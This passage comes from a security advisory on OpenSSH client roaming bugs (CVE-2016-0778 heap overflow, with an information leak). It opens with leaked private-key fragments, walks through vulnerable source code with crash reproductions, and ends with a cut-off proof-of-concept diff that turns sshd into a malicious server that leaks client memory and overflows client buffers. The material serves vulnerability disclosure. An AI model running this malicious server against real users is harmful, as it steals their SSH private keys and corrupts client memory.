/tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 